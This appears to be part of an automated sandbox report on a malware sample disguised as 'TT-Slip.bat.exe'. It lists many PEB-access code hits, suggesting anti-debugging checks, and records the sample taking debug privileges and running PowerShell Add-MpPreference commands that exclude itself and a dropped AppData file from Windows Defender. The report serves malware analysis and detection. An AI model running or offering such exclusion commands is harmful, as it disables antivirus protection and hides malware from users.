Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0169A2C3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0169A2C3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0169A2C3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0169A2C3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0169A2C3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BB2C0 mov eax, dword ptr fs:[00000030h]	9_2_016BB2C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BB2C0 mov eax, dword ptr fs:[00000030h]	9_2_016BB2C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BB2C0 mov eax, dword ptr fs:[00000030h]	9_2_016BB2C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BB2C0 mov eax, dword ptr fs:[00000030h]	9_2_016BB2C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BB2C0 mov eax, dword ptr fs:[00000030h]	9_2_016BB2C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BB2C0 mov eax, dword ptr fs:[00000030h]	9_2_016BB2C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BB2C0 mov eax, dword ptr fs:[00000030h]	9_2_016BB2C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016992C5 mov eax, dword ptr fs:[00000030h]	9_2_016992C5
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016992C5 mov eax, dword ptr fs:[00000030h]	9_2_016992C5
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BF2D0 mov eax, dword ptr fs:[00000030h]	9_2_016BF2D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BF2D0 mov eax, dword ptr fs:[00000030h]	9_2_016BF2D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168B2D3 mov eax, dword ptr fs:[00000030h]	9_2_0168B2D3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168B2D3 mov eax, dword ptr fs:[00000030h]	9_2_0168B2D3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168B2D3 mov eax, dword ptr fs:[00000030h]	9_2_0168B2D3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A02A0 mov eax, dword ptr fs:[00000030h]	9_2_016A02A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A02A0 mov eax, dword ptr fs:[00000030h]	9_2_016A02A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A52A0 mov eax, dword ptr fs:[00000030h]	9_2_016A52A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A52A0 mov eax, dword ptr fs:[00000030h]	9_2_016A52A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A52A0 mov eax, dword ptr fs:[00000030h]	9_2_016A52A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A52A0 mov eax, dword ptr fs:[00000030h]	9_2_016A52A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017192BC mov eax, dword ptr fs:[00000030h]	9_2_017192BC
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017192BC mov eax, dword ptr fs:[00000030h]	9_2_017192BC
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017192BC mov ecx, dword ptr fs:[00000030h]	9_2_017192BC
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017192BC mov ecx, dword ptr fs:[00000030h]	9_2_017192BC
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017272A0 mov eax, dword ptr fs:[00000030h]	9_2_017272A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017272A0 mov eax, dword ptr fs:[00000030h]	9_2_017272A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017262A0 mov eax, dword ptr fs:[00000030h]	9_2_017262A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017262A0 mov ecx, dword ptr fs:[00000030h]	9_2_017262A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017262A0 mov eax, dword ptr fs:[00000030h]	9_2_017262A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017262A0 mov eax, dword ptr fs:[00000030h]	9_2_017262A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017262A0 mov eax, dword ptr fs:[00000030h]	9_2_017262A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017262A0 mov eax, dword ptr fs:[00000030h]	9_2_017262A0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017592A6 mov eax, dword ptr fs:[00000030h]	9_2_017592A6
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017592A6 mov eax, dword ptr fs:[00000030h]	9_2_017592A6
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017592A6 mov eax, dword ptr fs:[00000030h]	9_2_017592A6
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017592A6 mov eax, dword ptr fs:[00000030h]	9_2_017592A6
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE284 mov eax, dword ptr fs:[00000030h]	9_2_016CE284
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE284 mov eax, dword ptr fs:[00000030h]	9_2_016CE284
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01710283 mov eax, dword ptr fs:[00000030h]	9_2_01710283
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01710283 mov eax, dword ptr fs:[00000030h]	9_2_01710283
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01710283 mov eax, dword ptr fs:[00000030h]	9_2_01710283
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C329E mov eax, dword ptr fs:[00000030h]	9_2_016C329E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C329E mov eax, dword ptr fs:[00000030h]	9_2_016C329E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01765283 mov eax, dword ptr fs:[00000030h]	9_2_01765283
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C656A mov eax, dword ptr fs:[00000030h]	9_2_016C656A
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C656A mov eax, dword ptr fs:[00000030h]	9_2_016C656A
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C656A mov eax, dword ptr fs:[00000030h]	9_2_016C656A
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168B562 mov eax, dword ptr fs:[00000030h]	9_2_0168B562
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CB570 mov eax, dword ptr fs:[00000030h]	9_2_016CB570
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CB570 mov eax, dword ptr fs:[00000030h]	9_2_016CB570
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01698550 mov eax, dword ptr fs:[00000030h]	9_2_01698550
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01698550 mov eax, dword ptr fs:[00000030h]	9_2_01698550
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01765537 mov eax, dword ptr fs:[00000030h]	9_2_01765537
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE53E mov eax, dword ptr fs:[00000030h]	9_2_016BE53E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE53E mov eax, dword ptr fs:[00000030h]	9_2_016BE53E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE53E mov eax, dword ptr fs:[00000030h]	9_2_016BE53E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE53E mov eax, dword ptr fs:[00000030h]	9_2_016BE53E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE53E mov eax, dword ptr fs:[00000030h]	9_2_016BE53E
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173F525 mov eax, dword ptr fs:[00000030h]	9_2_0173F525
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173F525 mov eax, dword ptr fs:[00000030h]	9_2_0173F525
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173F525 mov eax, dword ptr fs:[00000030h]	9_2_0173F525
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173F525 mov eax, dword ptr fs:[00000030h]	9_2_0173F525
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173F525 mov eax, dword ptr fs:[00000030h]	9_2_0173F525
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173F525 mov eax, dword ptr fs:[00000030h]	9_2_0173F525
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173F525 mov eax, dword ptr fs:[00000030h]	9_2_0173F525
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174B52F mov eax, dword ptr fs:[00000030h]	9_2_0174B52F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CD530 mov eax, dword ptr fs:[00000030h]	9_2_016CD530
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CD530 mov eax, dword ptr fs:[00000030h]	9_2_016CD530
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169D534 mov eax, dword ptr fs:[00000030h]	9_2_0169D534
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169D534 mov eax, dword ptr fs:[00000030h]	9_2_0169D534
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169D534 mov eax, dword ptr fs:[00000030h]	9_2_0169D534
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169D534 mov eax, dword ptr fs:[00000030h]	9_2_0169D534
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169D534 mov eax, dword ptr fs:[00000030h]	9_2_0169D534
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169D534 mov eax, dword ptr fs:[00000030h]	9_2_0169D534
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A0535 mov eax, dword ptr fs:[00000030h]	9_2_016A0535
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A0535 mov eax, dword ptr fs:[00000030h]	9_2_016A0535
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A0535 mov eax, dword ptr fs:[00000030h]	9_2_016A0535
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A0535 mov eax, dword ptr fs:[00000030h]	9_2_016A0535
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A0535 mov eax, dword ptr fs:[00000030h]	9_2_016A0535
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A0535 mov eax, dword ptr fs:[00000030h]	9_2_016A0535
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C7505 mov eax, dword ptr fs:[00000030h]	9_2_016C7505
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C7505 mov ecx, dword ptr fs:[00000030h]	9_2_016C7505
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01764500 mov eax, dword ptr fs:[00000030h]	9_2_01764500
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01764500 mov eax, dword ptr fs:[00000030h]	9_2_01764500
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01764500 mov eax, dword ptr fs:[00000030h]	9_2_01764500
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01764500 mov eax, dword ptr fs:[00000030h]	9_2_01764500
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01764500 mov eax, dword ptr fs:[00000030h]	9_2_01764500
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01764500 mov eax, dword ptr fs:[00000030h]	9_2_01764500
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01764500 mov eax, dword ptr fs:[00000030h]	9_2_01764500
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CC5ED mov eax, dword ptr fs:[00000030h]	9_2_016CC5ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CC5ED mov eax, dword ptr fs:[00000030h]	9_2_016CC5ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016925E0 mov eax, dword ptr fs:[00000030h]	9_2_016925E0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_016BE5E7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_016BE5E7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_016BE5E7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_016BE5E7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_016BE5E7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_016BE5E7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_016BE5E7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BE5E7 mov eax, dword ptr fs:[00000030h]	9_2_016BE5E7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B15F4 mov eax, dword ptr fs:[00000030h]	9_2_016B15F4
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B15F4 mov eax, dword ptr fs:[00000030h]	9_2_016B15F4
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B15F4 mov eax, dword ptr fs:[00000030h]	9_2_016B15F4
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B15F4 mov eax, dword ptr fs:[00000030h]	9_2_016B15F4
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B15F4 mov eax, dword ptr fs:[00000030h]	9_2_016B15F4
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B15F4 mov eax, dword ptr fs:[00000030h]	9_2_016B15F4
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0170D5D0 mov eax, dword ptr fs:[00000030h]	9_2_0170D5D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0170D5D0 mov ecx, dword ptr fs:[00000030h]	9_2_0170D5D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017635D7 mov eax, dword ptr fs:[00000030h]	9_2_017635D7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017635D7 mov eax, dword ptr fs:[00000030h]	9_2_017635D7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017635D7 mov eax, dword ptr fs:[00000030h]	9_2_017635D7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE5CF mov eax, dword ptr fs:[00000030h]	9_2_016CE5CF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE5CF mov eax, dword ptr fs:[00000030h]	9_2_016CE5CF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C55C0 mov eax, dword ptr fs:[00000030h]	9_2_016C55C0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B95DA mov eax, dword ptr fs:[00000030h]	9_2_016B95DA
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016965D0 mov eax, dword ptr fs:[00000030h]	9_2_016965D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CA5D0 mov eax, dword ptr fs:[00000030h]	9_2_016CA5D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CA5D0 mov eax, dword ptr fs:[00000030h]	9_2_016CA5D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017655C9 mov eax, dword ptr fs:[00000030h]	9_2_017655C9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B15A9 mov eax, dword ptr fs:[00000030h]	9_2_016B15A9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B15A9 mov eax, dword ptr fs:[00000030h]	9_2_016B15A9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B15A9 mov eax, dword ptr fs:[00000030h]	9_2_016B15A9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B15A9 mov eax, dword ptr fs:[00000030h]	9_2_016B15A9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B15A9 mov eax, dword ptr fs:[00000030h]	9_2_016B15A9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017235BA mov eax, dword ptr fs:[00000030h]	9_2_017235BA
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017235BA mov eax, dword ptr fs:[00000030h]	9_2_017235BA
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017235BA mov eax, dword ptr fs:[00000030h]	9_2_017235BA
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017235BA mov eax, dword ptr fs:[00000030h]	9_2_017235BA
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174F5BE mov eax, dword ptr fs:[00000030h]	9_2_0174F5BE
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017105A7 mov eax, dword ptr fs:[00000030h]	9_2_017105A7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017105A7 mov eax, dword ptr fs:[00000030h]	9_2_017105A7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017105A7 mov eax, dword ptr fs:[00000030h]	9_2_017105A7
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B45B1 mov eax, dword ptr fs:[00000030h]	9_2_016B45B1
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B45B1 mov eax, dword ptr fs:[00000030h]	9_2_016B45B1
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BF5B0 mov eax, dword ptr fs:[00000030h]	9_2_016BF5B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BF5B0 mov eax, dword ptr fs:[00000030h]	9_2_016BF5B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BF5B0 mov eax, dword ptr fs:[00000030h]	9_2_016BF5B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BF5B0 mov eax, dword ptr fs:[00000030h]	9_2_016BF5B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BF5B0 mov eax, dword ptr fs:[00000030h]	9_2_016BF5B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BF5B0 mov eax, dword ptr fs:[00000030h]	9_2_016BF5B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BF5B0 mov eax, dword ptr fs:[00000030h]	9_2_016BF5B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BF5B0 mov eax, dword ptr fs:[00000030h]	9_2_016BF5B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BF5B0 mov eax, dword ptr fs:[00000030h]	9_2_016BF5B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C4588 mov eax, dword ptr fs:[00000030h]	9_2_016C4588
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171B594 mov eax, dword ptr fs:[00000030h]	9_2_0171B594
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171B594 mov eax, dword ptr fs:[00000030h]	9_2_0171B594
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168758F mov eax, dword ptr fs:[00000030h]	9_2_0168758F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168758F mov eax, dword ptr fs:[00000030h]	9_2_0168758F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168758F mov eax, dword ptr fs:[00000030h]	9_2_0168758F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01692582 mov eax, dword ptr fs:[00000030h]	9_2_01692582
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01692582 mov ecx, dword ptr fs:[00000030h]	9_2_01692582
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE59C mov eax, dword ptr fs:[00000030h]	9_2_016CE59C
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01691460 mov eax, dword ptr fs:[00000030h]	9_2_01691460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01691460 mov eax, dword ptr fs:[00000030h]	9_2_01691460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01691460 mov eax, dword ptr fs:[00000030h]	9_2_01691460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01691460 mov eax, dword ptr fs:[00000030h]	9_2_01691460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01691460 mov eax, dword ptr fs:[00000030h]	9_2_01691460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0176547F mov eax, dword ptr fs:[00000030h]	9_2_0176547F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AF460 mov eax, dword ptr fs:[00000030h]	9_2_016AF460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AF460 mov eax, dword ptr fs:[00000030h]	9_2_016AF460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AF460 mov eax, dword ptr fs:[00000030h]	9_2_016AF460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AF460 mov eax, dword ptr fs:[00000030h]	9_2_016AF460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AF460 mov eax, dword ptr fs:[00000030h]	9_2_016AF460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AF460 mov eax, dword ptr fs:[00000030h]	9_2_016AF460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171C460 mov ecx, dword ptr fs:[00000030h]	9_2_0171C460
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BA470 mov eax, dword ptr fs:[00000030h]	9_2_016BA470
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BA470 mov eax, dword ptr fs:[00000030h]	9_2_016BA470
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BA470 mov eax, dword ptr fs:[00000030h]	9_2_016BA470
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174F453 mov eax, dword ptr fs:[00000030h]	9_2_0174F453
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169B440 mov eax, dword ptr fs:[00000030h]	9_2_0169B440
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169B440 mov eax, dword ptr fs:[00000030h]	9_2_0169B440
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169B440 mov eax, dword ptr fs:[00000030h]	9_2_0169B440
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169B440 mov eax, dword ptr fs:[00000030h]	9_2_0169B440
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169B440 mov eax, dword ptr fs:[00000030h]	9_2_0169B440
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0169B440 mov eax, dword ptr fs:[00000030h]	9_2_0169B440
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE443 mov eax, dword ptr fs:[00000030h]	9_2_016CE443
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE443 mov eax, dword ptr fs:[00000030h]	9_2_016CE443
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE443 mov eax, dword ptr fs:[00000030h]	9_2_016CE443
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE443 mov eax, dword ptr fs:[00000030h]	9_2_016CE443
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE443 mov eax, dword ptr fs:[00000030h]	9_2_016CE443
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE443 mov eax, dword ptr fs:[00000030h]	9_2_016CE443
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE443 mov eax, dword ptr fs:[00000030h]	9_2_016CE443
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CE443 mov eax, dword ptr fs:[00000030h]	9_2_016CE443
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B245A mov eax, dword ptr fs:[00000030h]	9_2_016B245A
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168645D mov eax, dword ptr fs:[00000030h]	9_2_0168645D
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168E420 mov eax, dword ptr fs:[00000030h]	9_2_0168E420
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168E420 mov eax, dword ptr fs:[00000030h]	9_2_0168E420
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168E420 mov eax, dword ptr fs:[00000030h]	9_2_0168E420
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168C427 mov eax, dword ptr fs:[00000030h]	9_2_0168C427

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe"
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe"
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT-Slip.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe"	Jump to behavior
